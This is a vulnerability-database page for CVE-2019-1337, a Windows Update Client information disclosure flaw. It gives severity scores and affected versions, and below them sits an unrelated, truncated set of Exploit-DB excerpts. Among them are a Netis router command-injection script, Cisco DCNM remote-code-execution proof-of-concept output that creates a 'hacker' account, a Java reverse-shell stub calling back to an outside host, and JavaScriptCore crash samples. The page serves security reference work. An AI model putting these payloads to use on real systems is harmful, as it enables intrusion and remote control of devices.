CVE-2019-1337
Published: 2019-10-10
Priority: P429 · medium · 5.5 (CVSS 3.1)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS: 2.05% (78.9th percentile)
An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Information Disclosure Vulnerability'.
Affected (19 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10_version_1903_for_32-bit_systems | — | — |
| microsoft | windows_10_version_1903_for_arm64-based_systems | — | — |
| microsoft | windows_10_version_1903_for_x64-based_systems | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server_2016 | — | — |
| msrc | windows_10_version_1809_for_32-bit_systems | — | — |
| msrc | windows_10_version_1809_for_arm64-based_systems | — | — |
| msrc | windows_10_version_1809_for_x64-based_systems | — | — |
| msrc | windows_10_version_1903_for_32-bit_systems | — | — |
| msrc | windows_10_version_1903_for_arm64-based_systems | — | — |
| msrc | windows_10_version_1903_for_x64-based_systems | — | — |
| msrc | windows_server_2019 | — | — |
| msrc | windows_server_version_1903 | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 5.5 | MEDIUM | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
| nvd | 2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |
| vendor_msrc | — | 5.5 | MEDIUM | — |
Microsoft
CVE-2019-1337 [MEDIUM] Windows Update Client Information Disclosure Vulnerability
vendor_msrc·2019-10-08·CVSS 5.5
Description: An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process.
To exploit this vulnerability, an authenticated attacker could run a specially crafted application in user mode.
The update addresses the vulnerability by correcting how the Windows Update Client handles objects in memory.
FAQ: What type of information could be disclosed by this vulnerability?
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memo
GHSA
CVE-2019-1337 [MEDIUM] CWE-200 GHSA-x5vx-fhp4-xhcv
ghsa_unreviewed·2022-05-24
An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Information Disclosure Vulnerability'.
No detection rules found.
Exploit-DB
CVE-2019-19356 [MEDIUM] Netis WF2419 2.2.36123 - Remote Code Execution
exploitdb·2020-03-02·CVSS 5.5
---
```python
# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356
# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"
#!/usr/bin/env python
import argparse
import requests
import json

def exploit(host,cmd):
    # Send Payload
    headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',
                   'Content-Type': 'application/x-www-form-urlencoded'}
    post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&
```
Exploit-DB
CVE-2019-15984 [CRITICAL] Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
exploitdb·2020-02-06·CVSS 9.8
---
```python
#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! tem
```
Exploit-DB
CVE-2019-15978 [HIGH] Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
exploitdb·2020-02-06·CVSS 7.5
---
```python
#!/usr/bin/python
"""
Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
- Release: 11.2(1)
- Release Date: 05-Jun-2019
- FileName: dcnm-va.11.2.1.iso.zip
- Size: 4473.54 MB (4690850167 bytes)
- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb
Bug 1: CVE-2019-15977 / ZDI-20-012
Bug 2: CVE-2019-15977 / ZDI-20-013
Bug 3: CVE-2019-15978 / ZDI-20-102
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.123 192.168.100.59
(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.
```
Exploit-DB
CVE-2019-15975 [CRITICAL] Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb·2020-02-06·CVSS 9.8
---
```python
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
    static{
        try {
            String host = "192.168.100.159";
            int port = 1337;
            String cmd =
```
Exploit-DB
CVE-2019-8820 JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects
exploitdb·2019-11-05
---
The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds:
function main() {
const v2 = [1337,1337];
const v3 = [1337,v2,v2,0];
Object.__proto__ = v3;
for (let v10 = 0; v10 inherits(*cell->JSC::JSCell::vm(), std::remove_pointer::type::info())
../../Source/JavaScriptCore/runtime/WriteBarrier.h(58) : void JSC::validateCell(T) [T = JSC::JSFunction *]
1 0x108070cb9 WTFCrash
2 0x103907f0b WTFCrashWithInfo(int, char const*, char const*, int)
3 0x106c0900f void JSC::validateCell(JSC::JSFunction*)
4 0x106c0275f JSC::WriteBarrierBase >::set(JSC::VM&, JSC::JSCell const*, JSC::JSFunction*)
5 0x10705a727 JSC::DirectArguments::setCallee(JSC::VM&, JSC::JSFunction*)
6 0x
Exploit-DB
CVE-2019-8518 WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check
exploitdb·2019-04-03
---
```javascript
/*
While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):
*/
// Run with --thresholdForFTLOptimizeAfterWarmUp=1000
// First array probably required to avoid COW backing storage or so...
const v3 = [1337,1337,1337,1337];
const v6 = [1337,1337];
function v7(v8) {
    for (let v9 in v8) {
        v8.a = 42;
        const v10 = v8[-698666199];
    }
}
while (true) {
    const v14 = v7(v6);
    const v15 = v7(1337);
}
/*
Note that the sample requires the FTL JIT threshold to be lowered in order to trigger. However, I also have a slightly modified version that (l
```
Talos
[MEDIUM] Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-10-08·CVSS 6.4
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 60 vulnerabilities, nine of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, the Chakra Scripting Engine, the Windows operating system and the SharePoint software.
Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.
### Critical vulnerabilities
Microsoft disclosed nine critical vulnerabilities this month, eight of which we will highlight below.
CVE-2019-1333 is a client-side remote execution vulne